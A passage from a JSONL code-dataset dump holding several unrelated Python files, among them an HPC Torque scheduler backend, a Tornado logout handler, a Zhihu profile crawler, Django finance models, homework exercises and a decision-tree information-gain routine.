getElementTextByTag(self,filename,tagName):\n root = ET.parse(filename).getroot()\n elementText =[]\n for element in root.iter(tagName):\n elementText.append(element.text)\n \n return elementText\n \n \n \n '''\n return attribute list by tag\n [{attrib1},{attrib2}]\n \n filename : xml file include filepath\n tag : \n \n ''' \n def getElementAttribByTag(self,filename,tag):\n root = ET.parse(filename)\n attributeList = []\n for element in root.iter(tag):\n attributeList.append(element.attrib) \n return attributeList \n\n\n\n \n","sub_path":"lib/xmlparser.py","file_name":"xmlparser.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"253780512","text":"# Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich)\n# ReFrame Project Developers. See the top-level LICENSE file for details.\n#\n# SPDX-License-Identifier: BSD-3-Clause\n#\n# Torque backend\n#\n# - Initial version submitted by Samuel Moors, Vrije Universiteit Brussel (VUB)\n#\n\nimport re\nimport os\nfrom datetime import datetime\n\nimport reframe.utility.os_ext as os_ext\nfrom reframe.core.backends import register_scheduler\nfrom reframe.core.exceptions import JobError\nfrom reframe.core.logging import getlogger\nfrom reframe.core.schedulers.pbs import PbsJobScheduler, _run_strict\n\n\nJOB_STATES = {\n 'Q': 'QUEUED',\n 'H': 'HELD',\n 'R': 'RUNNING',\n 'E': 'EXITING',\n 'T': 'MOVED',\n 'W': 'WAITING',\n 'S': 'SUSPENDED',\n 'C': 'COMPLETED',\n}\n\n\n@register_scheduler('torque')\nclass TorqueJobScheduler(PbsJobScheduler):\n TASKS_OPT = '-l nodes={num_nodes}:ppn={num_cpus_per_node}'\n\n def _set_nodelist(self, job, nodespec):\n if job.nodelist is not None:\n return\n\n job.nodelist = [x.split('/')[0] for x in nodespec.split('+')]\n job.nodelist.sort()\n\n def _update_state(self, job):\n '''Check the status of the job.'''\n\n completed = os_ext.run_command('qstat -f %s' % job.jobid)\n\n # Depending on the configuration, completed jobs will remain on the job\n # list for a limited time, or be removed upon completion.\n # If qstat cannot find the jobid, it returns code 153.\n if completed.returncode == 153:\n getlogger().debug(\n 'jobid not known by scheduler, assuming job completed'\n )\n job.state = 'COMPLETED'\n return\n\n if completed.returncode != 0:\n raise JobError('qstat failed: %s' % completed.stderr, job.jobid)\n\n nodelist_match = re.search(\n r'exec_host = (?P[\\S\\t\\n]+)',\n completed.stdout,\n re.MULTILINE\n )\n if nodelist_match:\n nodespec = nodelist_match.group('nodespec')\n nodespec = re.sub(r'[\\n\\t]*', '', nodespec)\n self._set_nodelist(job, nodespec)\n\n state_match = re.search(\n r'^\\s*job_state = (?P[A-Z])', completed.stdout, re.MULTILINE\n )\n if not state_match:\n getlogger().debug(\n 'job state not found (stdout follows)\\n%s' % completed.stdout\n )\n return\n\n state = state_match.group('state')\n job.state = JOB_STATES[state]\n if job.state == 'COMPLETED':\n code_match = re.search(\n r'^\\s*exit_status = (?P\\d+)',\n completed.stdout,\n re.MULTILINE,\n )\n if not code_match:\n return\n\n job.exitcode = int(code_match.group('code'))\n\n def finished(self, job):\n try:\n self._update_state(job)\n except JobError as e:\n # We ignore these exceptions at this point and we simply mark the\n # job as unfinished.\n getlogger().debug('ignoring error during polling: %s' % e)\n return False\n else:\n if job.max_pending_time and job.state in ['QUEUED',\n 'HELD',\n 'WAITING']:\n if datetime.now() - self._submit_time >= job.max_pending_time:\n self.cancel(job)\n raise JobError('maximum pending time exceeded',\n jobid=job.jobid)\n\n stdout = os.path.join(job.workdir, job.stdout)\n stderr = os.path.join(job.workdir, job.stderr)\n output_ready = os.path.exists(stdout) and os.path.exists(stderr)\n done = self._cancelled or output_ready\n return job.state == 'COMPLETED' and done\n","sub_path":"reframe/core/schedulers/torque.py","file_name":"torque.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"470848636","text":"SERVER_IP = \"127.0.0.1\"\r\nSERVER_PORT = 1234\r\nMAX_CLIENT_NUM = 7\r\nDATABASE_PATH = 'User.db'\r\nBUFFER_SIZE = 512\r\n\r\nMSG_LOGIN = 'login'\r\nMSG_REGISTER = 'create'\r\nMSG_LOGOUT = 'logout'\r\nMSG_CHAT = 'chat'\r\nMSG_INFO = 'info'\r\nMSG_ROLLSTART = 'rollstart'\r\nMSG_ROLL = 'roll'\r\n\r\nSTATE_ONLINE = 1\r\nSTATE_OFFLINE = 0\r\n","sub_path":"PyChatroom/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"457455528","text":"# Copyright (C) 2016 Hewlett Packard Enterprise Development LP\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom tornado import gen\nfrom tornado.log import app_log\nimport httplib\nimport userauth\n\nfrom opsrest.handlers import base\nfrom opsrest.exceptions import APIException\nfrom opsrest.utils.utils import redirect_http_to_https\nfrom opsrest.utils.userutils import check_authenticated\n\nclass LogoutHandler(base.BaseHandler):\n\n # pass the application reference to the handlers\n def initialize(self, ref_object):\n self.error_message = None\n\n # Overwrite BaseHandler's prepare, as LogoutHandler does not\n # require evrything in Base\n def prepare(self):\n try:\n redirect_http_to_https(self)\n\n app_log.debug(\"Incoming request from %s: %s\",\n self.request.remote_ip,\n self.request)\n\n check_authenticated(self, self.request.method)\n\n except Exception as e:\n self.on_exception(e)\n self.finish()\n\n @gen.coroutine\n def post(self):\n try:\n app_log.debug(\"Executing Logout POST...\")\n\n userauth.handle_user_logout(self)\n self.set_status(httplib.OK)\n\n except APIException as e:\n self.on_exception(e)\n\n except Exception as e:\n self.on_exception(e)\n\n self.finish()\n","sub_path":"opsrest/handlers/logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"434976463","text":"import timeit\nfrom decimal import Decimal as D\n\n\nlog = open(\"log.txt\", \"w\")\n\n\ndef fix11():\n a = int(5 ** 7)\n b = int(7 ** 5)\n c = int(17 ** 19)\n d = int(19 ** 17)\n\n z = a + b\n x = c + d\n\n return z, x\n\n\ndef fix12():\n a = float(1e30)\n b = float(1e-30)\n z = a + b\n return z\n\n\ndef fix13():\n a = complex(1 + 2j)\n b = complex(2 - 1j)\n z = a + b\n return z\n\n\ndef fix14():\n a = D(0.33)\n b = D(1.66)\n c = D(5 ** 7)\n d = D(7 ** 5)\n e = D(19 ** 17)\n f = D(17 ** 19)\n z = a + b\n x = c + d\n y = e + f\n return z, x, y\n\n\ndef fix21():\n a = int(5 ** 7)\n b = int(7 ** 5)\n c = int(17 ** 19)\n d = int(19 ** 17)\n\n z = a * b\n x = c * d\n\n return z, x\n\n\ndef fix22():\n a = float(1e30)\n b = float(1e-30)\n z = a * b\n return z\n\n\ndef fix23():\n a = complex(1 + 2j)\n b = complex(2 - 1j)\n z = a * b\n return z\n\n\ndef fix24():\n a = D(0.33)\n b = D(1.66)\n c = D(5 ** 7)\n d = D(7 ** 5)\n e = D(19 ** 17)\n f = D(17 ** 19)\n z = a * b\n x = c * d\n y = e * f\n return z, x, y\n\n\ndef fix31():\n a = int(5 ** 7)\n b = int(7 ** 5)\n c = int(17 ** 19)\n d = int(19 ** 17)\n\n z = a / b\n x = c / d\n\n return z, x\n\n\ndef fix32():\n a = float(1e30)\n b = float(1e-30)\n z = a / b\n return z\n\n\ndef fix33():\n a = complex(1 + 2j)\n b = complex(2 - 1j)\n z = a / b\n return z\n\n\ndef fix34():\n a = D(0.33)\n b = D(1.66)\n c = D(5 ** 7)\n d = D(7 ** 5)\n e = D(19 ** 17)\n f = D(17 ** 19)\n z = a / b\n x = c / d\n y = e / f\n return z, x, y\n\n\ndef fix4():\n s = \"ab\" * 10000 + \"c\"\n for i in s:\n if i == \"a\":\n return True\n else:\n return False\n\n\ndef fix5():\n L = [i for i in range(10000)]\n for i in L:\n if i == 0:\n print(i)\n if i == 9999:\n print(i)\n if i == 10000:\n print(i)\n\n\nresult = timeit.timeit(\"fix11()\", setup=\"from __main__ import fix11\")\nlog.write(\"SpeedTest11:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix12()\", setup=\"from __main__ import fix12\")\nlog.write(\"SpeedTest12:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix13()\", setup=\"from __main__ import fix13\")\nlog.write(\"SpeedTest13:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix14()\", setup=\"from __main__ import fix14\")\nlog.write(\"SpeedTest14:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix21()\", setup=\"from __main__ import fix21\")\nlog.write(\"SpeedTest21:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix22()\", setup=\"from __main__ import fix22\")\nlog.write(\"SpeedTest22:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix23()\", setup=\"from __main__ import fix23\")\nlog.write(\"SpeedTest23:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix24()\", setup=\"from __main__ import fix24\")\nlog.write(\"SpeedTest24:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix31()\", setup=\"from __main__ import fix31\")\nlog.write(\"SpeedTest31:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix32()\", setup=\"from __main__ import fix32\")\nlog.write(\"SpeedTest32:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix33()\", setup=\"from __main__ import fix33\")\nlog.write(\"SpeedTest33:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix34()\", setup=\"from __main__ import fix34\")\nlog.write(\"SpeedTest34:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\n\nresult = timeit.timeit(\"fix4()\", setup=\"from __main__ import fix4\")\nlog.write(\"SpeedTest4:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix5()\", setup=\"from __main__ import fix5\")\nlog.write(\"SpeedTest5:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\n\n# Функция Аккермана\n\n\ndef akker(a, b):\n if a == 0:\n return b + 1\n if b == 0:\n return akker(a - 1, 1)\n return akker(a - 1, akker(a, b - 1))\n\n\n# Уровень 5\n\n\ndef enqueue(l, e):\n l.append(e)\n\n\ndef dequeue(l):\n if l:\n return l.pop(0)\n\n\nif __name__ == \"__main__\":\n x = []\n assert dequeue(x) is None\n assert enqueue(x, 1) is None\n assert enqueue(x, 2) is None\n assert dequeue(x) == 1\n assert enqueue(x, 3) is None\n assert dequeue(x) == 2\n assert dequeue(x) == 3\n assert dequeue(x) is None\n assert x == []\n# Уровень 6\n\n\ndef enqueue(l, e, p):\n l.setdefault(p, []).append(\n e\n ) # возвращает значение 2 элемента - з и то что вставлено\n\n\ndef dequeue(l):\n sorted_key = sorted(l)\n order_key = reversed(sorted_key)\n for p in order_key:\n q = l[p]\n if not q:\n del l[p]\n return l.pop(0)\n","sub_path":"homeworks/pavel_titov/lesson03.py","file_name":"lesson03.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"468510721","text":"# -*- coding: utf-8 -*-\n\n_author_=\"ZengYancheng\"\nfrom bs4 import BeautifulSoup\nimport re\nimport basic\nimport time\n\ndef crawl_user(user_id):\n person=basic.person_info()\n person.id=user_id\n try:\n res = basic.session.get(basic.html_head+user_id+basic.followee, headers=basic.headers_base, cookies=basic.cookies)\n soup=BeautifulSoup(res.text,\"html.parser\")\n except:\n exit(-1)\n basic.logfile.write(\"获取html或解析文档时发生error\\n\")\n now=time.strftime('%d %H:%M:%S',time.localtime(time.time()))\n basic.logfile.write(str(now)+\"\\tuser \"+user_id+\"\\t\"+str(res.status_code))\n print (\"user:\"+user_id)\n\n try:\n person_info_div=soup.body.find(\"div\",role=\"main\").div.div\n #判断性别\n try:\n gender_str=person_info_div.find(\"div\",class_=\"zm-profile-header ProfileCard\").div.find(\"div\",class_=\"body clearfix\").div.div.div.div.span.find(\"span\",class_=\"item gender\").i['class'][1]\n except:\n person.gender=3\n else:\n if(re.search(\"female\",gender_str)):\n person.gender=2\n elif(re.search(\"male\",gender_str)):\n person.gender=1\n else:\n person.gender=-1\n\n #获取姓名\n person_name_div=person_info_div.find(\"div\",class_=\"zm-profile-header ProfileCard\").find(\"div\",class_=\"zm-profile-header-main\").find(\"div\",class_=\"top\")\n person.name=person_name_div.find(\"div\",class_=\"title-section ellipsis\").find(\"a\",class_=\"name\").contents[0]\n #获取赞同、感谢\n person_info_gain_div=person_info_div.div.find(\"div\",class_=\"zm-profile-header-operation zg-clear \").div\n person.agree=int(person_info_gain_div.span.find_next_sibling().strong.contents[0])\n person.thanks=int(person_info_gain_div.span.find_next_sibling().find_next_sibling().strong.contents[0])\n\n #获取提问、回答、专栏文章、收藏、公共编辑\n person_info_card_div=person_info_div.div.find(\"div\",class_=\"profile-navbar clearfix\")\n current_a_tag=person_info_card_div.a.find_next_sibling()\n person.questions=int(current_a_tag.span.contents[0])\n current_a_tag=current_a_tag.find_next_sibling()\n person.answers=int(current_a_tag.span.contents[0])\n current_a_tag=current_a_tag.find_next_sibling()\n person.articles=int(current_a_tag.span.contents[0])\n current_a_tag=current_a_tag.find_next_sibling()\n person.collect=int(current_a_tag.span.contents[0])\n current_a_tag=current_a_tag.find_next_sibling()\n person.pub_edit=int(current_a_tag.span.contents[0])\n\n #获取关注了、关注者\n side_bar_div=soup.body.find(\"div\",role=\"main\").find(\"div\",class_=\"zu-main-sidebar\").div\n person.followees=int(side_bar_div.a.strong.contents[0])\n person.followers=int(side_bar_div.a.find_next_sibling().strong.contents[0])\n #在获取info时发生异常\n except:\n basic.logfile.write(\"\\terror \\n\")\n else:\n #保存数据\n basic.infofile.write(person.id+\"\\t\")\n basic.infofile.write(person.name.encode('utf-8')+\"\\t\")\n if(person.gender==1):\n basic.infofile.write(\"男\\t\")\n elif (person.gender==2):\n basic.infofile.write(\"女\\t\")\n elif(person.gender==3):\n basic.infofile.write(\"未填写\\t\")\n else:\n basic.infofile.write(str(person.gender)+\" error\\t\")\n basic.infofile.write(str(person.agree)+\"\\t\")\n basic.infofile.write(str(person.thanks)+\"\\t\")\n basic.infofile.write(str(person.questions)+\"\\t\")\n basic.infofile.write(str(person.answers)+\"\\t\")\n basic.infofile.write(str(person.articles)+\"\\t\")\n basic.infofile.write(str(person.collect)+\"\\t\")\n basic.infofile.write(str(person.pub_edit)+\"\\t\")\n basic.infofile.write(str(person.followees)+\"\\t\")\n basic.infofile.write(str(person.followers)+\"\\n\")\n basic.logfile.write(\"\\tdata saved\\n\")\n finally:\n try:\n #获取关注了列表,并加入队列\n if(basic.queue.qsize()<350):\n followee_list_div=person_info_div.find(\"div\",class_=\"zm-profile-section-wrap zm-profile-followee-page\").find(\"div\",class_=\"zm-profile-section-list\").div.div\n current_followee=followee_list_div.div\n count=0\n while (current_followee is not None):\n href_str=current_followee.find(\"div\",class_=\"zm-list-content-medium\").h2.a['href']\n href_id=re.sub(\"https://www.zhihu.com/people/\",\"\",href_str)\n if((\"/\"+href_id+\"/\") not in basic.checked_id):\n count+=1\n basic.queue.put(href_id)\n basic.checked_id+=href_id+\"/\"\n current_followee=current_followee.find_next_sibling()\n now=time.strftime('%d %H:%M:%S',time.localtime(time.time()))\n basic.logfile.write(str(now)+\"\\t\"+str(count)+\" followees put into queue\\n\")\n except:\n pass\n","sub_path":"crawl_user.py","file_name":"crawl_user.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"577955192","text":"from django.db import models\n\n\nclass TransactionType(models.Model):\n title = models.CharField(max_length= 60)\n\n def __str__(self):\n return self.title\n\n\nclass One(models.Model):\n title = models.CharField(max_length= 60)\n transaction_type = models.ForeignKey(TransactionType, on_delete= models.CASCADE)\n\n def __str__(self):\n return self.title\n\n\nclass Two(models.Model):\n title = models.CharField(max_length= 60)\n upper_category = models.ForeignKey(One, on_delete= models.CASCADE)\n\n def __str__(self):\n return self.title\n\n\nclass Three(models.Model):\n title = models.CharField(max_length= 60)\n upper_category = models.ForeignKey(Two, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.title\n\n\nclass Four(models.Model):\n title = models.CharField(max_length= 60)\n upper_category = models.ForeignKey(Three, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.title\n\n\nclass Currency(models.Model):\n title = models.CharField(max_length= 60)\n\n def __str__(self):\n return self.title\n\n\nclass Bank(models.Model):\n title = models.CharField(max_length=60)\n isBank = models.BooleanField()\n balance = models.IntegerField()\n bank = models.ManyToManyField('self', related_name='receiver_banks', symmetrical=False)\n\n def __str__(self):\n return self.title\n\n\nclass Transaction(models.Model):\n description = models.CharField(max_length=60)\n amount = models.PositiveIntegerField()\n currency = models.ForeignKey(Currency, on_delete=models.PROTECT)\n datetime = models.DateTimeField(auto_now=False)\n one = models.ForeignKey(One, on_delete=models.SET_NULL, null= True)\n two = models.ForeignKey(Two, on_delete=models.SET_NULL, null=True)\n three = models.ForeignKey(Three, on_delete=models.SET_NULL, null=True)\n four = models.ForeignKey(Four, on_delete=models.SET_NULL, null=True)\n transaction_method = models.CharField(max_length= 30, null= True)\n transaction_type = models.ForeignKey(TransactionType, on_delete=models.SET_NULL, null= True)\n bank = models.ForeignKey(Bank, on_delete= models.SET_NULL, null= True)\n bank_from = models.ForeignKey(Bank, on_delete= models.SET_NULL, null= True, related_name='bank_from')\n bank_to = models.ForeignKey(Bank, on_delete= models.SET_NULL, null= True, related_name='bank_to')\n\n def __str__(self):\n return self.description\n\n def save(self, *args, **kwargs):\n transaction = super(Transaction, self).save(*args, **kwargs)\n #checks if transaction is an entry transaction\n if str(getattr(self, 'transaction_type')) == \"Giriş\":\n if getattr(self, 'transaction_method') == 'cash':\n nakit_kasa = Bank.objects.get(pk=1)\n current_balance = nakit_kasa.balance\n nakit_kasa.balance = current_balance + getattr(self, 'amount')\n nakit_kasa.save()\n elif getattr(self, 'transaction_method') == 'bank':\n print(getattr(self, 'bank'))\n banka = Bank.objects.filter(title= getattr(self, 'bank')).first()\n current_balance = banka.balance\n banka.balance = current_balance + getattr(self, 'amount')\n banka.save()\n elif str(getattr(self, 'transaction_type')) == \"Çıkış\":\n if getattr(self, 'transaction_method') == 'cash':\n nakit_kasa = Bank.objects.get(pk=1)\n current_balance = nakit_kasa.balance\n nakit_kasa.balance = current_balance + getattr(self, 'amount')\n nakit_kasa.save()\n elif getattr(self, 'transaction_method') == 'bank':\n print(getattr(self, 'bank'))\n banka = Bank.objects.filter(title= getattr(self, 'bank')).first()\n current_balance = banka.balance\n banka.balance = current_balance - getattr(self, 'amount')\n banka.save()\n elif str(getattr(self, 'transaction_type')) == \"Virman\":\n bank_from =Bank.objects.filter(title = getattr(self, 'bank_from')).first()\n bank_to = Bank.objects.filter(title=getattr(self, 'bank_to')).first()\n bank_from.balance = bank_from.balance - getattr(self, 'amount')\n bank_to.balance = bank_to.balance + getattr(self, 'amount')\n bank_from.save()\n bank_to.save()\n\n #add check and credit card functionality\n return transaction\n\n","sub_path":"kasav4/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"525426211","text":"import base64\nimport pickle\n\nfrom django_redis import get_redis_connection\n\n\ndef merge_cookie_to_redis(request,user,response):\n\n \"\"\"\n 1.获取cookie数据\n 2.把redis数据读取下来\n 初始化一个字典\n 一个列表用于记录选中的id\n 一个列表用于记录未选中的id\n 3. 对cookie数据进行遍历\n 4.将合并的数据更新到redis中\n 5.删除cookie数据\n \"\"\"\n carts_str = request.COOKIES.get('carts')\n\n if carts_str is not None:\n carts_dict = pickle.loads(base64.b64decode(carts_str))\n\n else:\n return response\n\n redis_conn = get_redis_connection('carts')\n\n id_count_bytes = redis_conn.hgetall('carts_%s' % user.id)\n selected_ids = redis_conn.smembers('selected_%s' % user.id)\n\n dict1 = {}\n\n list1 = []\n\n list2 = []\n\n for sku_id,count in id_count_bytes.items():\n dict1[int(sku_id)] = int(count)\n for sku_id,count_selected_dict in carts_dict.items():\n\n if count_selected_dict['selected'] == True:\n list1.append(sku_id)\n else:\n list2.append(sku_id)\n for sku_id, count_selected_dict in carts_dict.items():\n\n dict1[sku_id] = count_selected_dict['count']\n if count_selected_dict['selected']:\n list1.append(sku_id)\n else:\n list2.append(sku_id)\n redis_conn.hmset('carts_%s'%user.id,dict1)\n if len(list1)>0:\n redis_conn.sadd('selected_%s'%user.id,*list1)\n else:\n redis_conn.sadd('selected_%s' % user.id, *list2)\n\n response.delete_cookie('carts')\n\n return response\n\n","sub_path":"meiduo_mall/apps/carts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"275734514","text":"# https://code.google.com/codejam/contest/6254486/dashboard#s=p2\nimport pickle\nimport fileinput\nfrom functools import lru_cache\n\n\ndef rwh_primes(n):\n # http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188\n \"\"\" Returns a list of primes < n \"\"\"\n sieve = [True] * n\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i]:\n sieve[i*i::2*i]=[False]*((n-i*i-1)//(2*i)+1)\n return set([2] + [i for i in range(3,n,2) if sieve[i]])\n\n\ndef get_digits(n):\n result = list()\n while n:\n result.append(n % 10)\n n //= 10\n return result\n\n\ndef interpret_in_base(n, base):\n return sum([base ** i * d for i, d in enumerate(get_digits(n))])\n\n\ndef generate_num(n, length):\n return int('1' + '{0:b}'.format(n).zfill(length - 2) + '1')\n\n\n@lru_cache(maxsize=None)\ndef is_prime(n):\n for i in range(2, int(n**0.5)+1):\n if n % i == 0:\n return False\n return True\n\n\ndef is_jamcoin(n, primes):\n result = True\n for base in range(2, 11):\n x = interpret_in_base(n, base)\n result = result and not x in primes\n return result\n\n\ndef is_jamcoin(n):\n result = True\n for base in range(2, 11):\n x = interpret_in_base(n, base)\n result = result and not is_prime(x)\n return result\n\n\ndef find_divisor(n):\n for y in range(2, n):\n if n % y == 0:\n return y\n return None\n\n\ndef build_divisors(n, primes):\n result = {1: None}\n for i in range(2, n+1):\n if i in primes:\n result[i] = None\n else:\n result[i] = find_divisor(i)\n return result\n\n\ndef get_divisors(n, primes):\n result = list()\n for base in range(2, 11):\n x = interpret_in_base(n, base)\n result.append(primes[x])\n return result\n\n\n@lru_cache(maxsize=None)\ndef get_divisors(n):\n result = list()\n for base in range(2, 11):\n x = interpret_in_base(n, base)\n result.append(find_divisor(x))\n return result\n\n\ndef main():\n f = fileinput.input()\n T = int(f.readline())\n assert (T == 1)\n print(\"Case #1:\")\n N, J = (int(s.strip()) for s in f.readline().split())\n MAX = 10 ** N\n \"\"\"\n try:\n primes = pickle.load(open(\"primes.pickle\", \"rb\"))\n divisors = pickle.load(open(\"divisors.pickle\", \"rb\"))\n except (OSError, IOError) as e:\n primes = rwh_primes(MAX)\n divisors = build_divisors(MAX, primes)\n pickle.dump(primes, open(\"primes.pickle\", \"wb\"))\n pickle.dump(divisors, open(\"divisors.pickle\", \"wb\"))\n \"\"\"\n nums = (generate_num(i, N) for i in range(MAX))\n cnt = 0\n for i, num in enumerate(nums):\n if is_jamcoin(num):\n print(\" \".join(map(str, [num] + get_divisors(num))))\n cnt += 1\n if cnt >= J:\n break\n\nif __name__ == '__main__':\n main()\n","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_bpgergo_coin_jam.py","file_name":"16_0_3_bpgergo_coin_jam.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"59066016","text":"def dictComp(stop, step):\n dict_list = {}\n count = 0\n\n\n array_list = [ array for array in range(1, stop+1) ]\n \n for digit in array_list:\n # Condition runs only on the first iteration when dict_list has no key value pair\n if len(dict_list) == 0:\n count += 1\n dict_list[\"items-{}\".format(count)] = [digit]\n\n # Condition when each value as a list is not greater than step \n elif len(dict_list[\"items-{}\".format(count)]) < step :\n dict_list[\"items-{}\".format(count)].append(digit)\n \n # Condition for creating new key value pair after the lenth of last pair is equal to step\n else:\n count += 1\n dict_list[\"items-{}\".format(count )] = [digit]\n\n if len(dict_list[\"items-{}\".format(count)]) < step:\n dict_list.popitem()\n\n print(dict_list)\n\n\ntry:\n stop = int(input(\"Enter a number as the stop limit for your array/list: \"))\n step = int(input(\"Enter the digit to use as a step: \"))\n print(\"\\n\")\n\n dictComp(stop, step)\n\nexcept ValueError:\n print(\"\\n\")\n print(\"Invalid input, please enter only a number\")\n print(\"\\n\")\n stop = int(input(\"Enter a number as the stop limit for your array/list: \"))\n step = int(input(\"Enter the digit to use as a step: \"))\n print(\"\\n\")\n\n dictComp(stop, step)\n","sub_path":"src/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"96632460","text":"import pandas as pd\nimport numpy as np\nimport pandas.api.types as pd_types\n\ndef pd_summary(df):\n # sample a maximum of 100k rows randomly\n if len(df) > 100000:\n df = df.sample(100000)\n\n # dtypes\n stats = {}\n for col in df.columns:\n if pd_types.is_object_dtype(df[col]) or pd_types.is_categorical_dtype(df[col]):\n stats[col] = df[col].value_counts()\n stats[col][np.nan] = df[col].isna().sum() \n\n elif pd_types.is_numeric_dtype(df[col]):\n stats[col] = df[col].quantile([0, 0.25, 0.5, 0.75, 1])\n stats[col].index = ['0%','25%', '50%', '75%', '100%']\n stats[col]['mean'] = df[col].mean()\n stats[col][np.nan] = df[col].isna().sum()\n stats[col] = stats[col][['0%', '25%', '50%', 'mean', '75%', '100%', np.nan]]\n else:\n stats[col] = None\n\n print(\"----- {} -----\".format(col))\n print(stats[col])\n print(\"\\n\")\n\n \n\n","sub_path":"lib/pandas_util.py","file_name":"pandas_util.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"196065138","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.externals import joblib\n\ndef load_dataframe():\n\t# Load heart disease dataset into pandas dataframe\n\tpathHeart = \"../../FYP_Data/heart-disease-uci/\"\n\theart = pd.read_csv(pathHeart + 'new_cleveland.csv')\n\theart = heart.drop(['dm'], axis=1)\n\n\treturn heart\n\ndef bin_values(heart):\n\tcolumns_to_bin = ['age', 'trestbps', 'trestbpd', 'chol', 'cigs', 'years', 'thalrest']\n\n\tfor col in columns_to_bin:\n\t\t# Chol requires more buckets\n\t\tif col == 'chol':\n\t\t\theart[col] = pd.cut(heart[col], 10)\n\t\telse:\n\t\t\theart[col] = pd.cut(heart[col], 7)\n\t\n\t# heart = pd.get_dummies(heart, columns = columns_to_bin)\n\n\treturn heart, columns_to_bin\n\ndef get_target_entropy(heart):\n\tentropy = 0\n\n\t# Possible values are they have heart disease or they don't (1 or 0 respectively)\n\tvalues = heart['target'].unique()\n\n\t# Calculate entropy\n\tfor value in values:\n\t\tval_split = heart['target'].value_counts()[value]/len(heart['target'])\n\t\tentropy = entropy + -val_split*np.log2(val_split)\n\n\treturn entropy\n\ndef get_feature_entropy(heart, feature):\n\tfeature_entropy = 0\n\n\t# To prevent the feature entropies from being null\n\tsmallest_num = np.finfo(float).tiny\n\n\t# Get the unique values for the target and the feature\n\tvalues = heart['target'].unique()\n\tfeature_vals = heart[feature].unique()\n\n\tfor value in feature_vals:\n\t\tval_entropy = 0\n\t\tfor val in values:\n\t\t\t# Get the number of possible values within the feature\n\t\t\tnum_of_each_val = heart[feature][heart[feature]==value]\n\t\t\t\n\t\t\t# For getting the ratio\n\t\t\tnumerator = len(num_of_each_val[heart['target']==val])\n\t\t\tdenominator = len(num_of_each_val)\n\t\t\t\n\t\t\t# Add the smallest number so its not dividing by 0\n\t\t\tval_split = numerator/(denominator+smallest_num)\n\t\t\t\n\t\t\t\"\"\" Get the entropy for both target feature \n\t\t\t\tvalues with respect to this feature value\n\t\t\t\"\"\"\n\t\t\t# Add the smallest number so its not log2(0)\n\t\t\tval_entropy = val_entropy + -val_split*np.log2(val_split+smallest_num)\n\n\t\t# Get the entropy for all values in this feature\n\t\tval_ratio = denominator/len(heart)\n\t\tfeature_entropy = feature_entropy + val_ratio*val_entropy\n\t\n\treturn feature_entropy\n\ndef calc_info_gains(heart, info_gains):\n\t# Calculate the info_gain for non-target features only\n\tfeatures = heart.drop(['target'], axis=1)\n\n\t# Get entropy of target feature\n\ttarget_entropy = get_target_entropy(heart)\n\n\tfor f in features:\n\t\tfeature_entropy = get_feature_entropy(heart, f)\n\t\tinformation_gain = target_entropy - feature_entropy\n\t\tinfo_gains[f] = information_gain\n\n\treturn info_gains\n\ndef find_feature(heart, info_gains):\n\tinfo_gains = 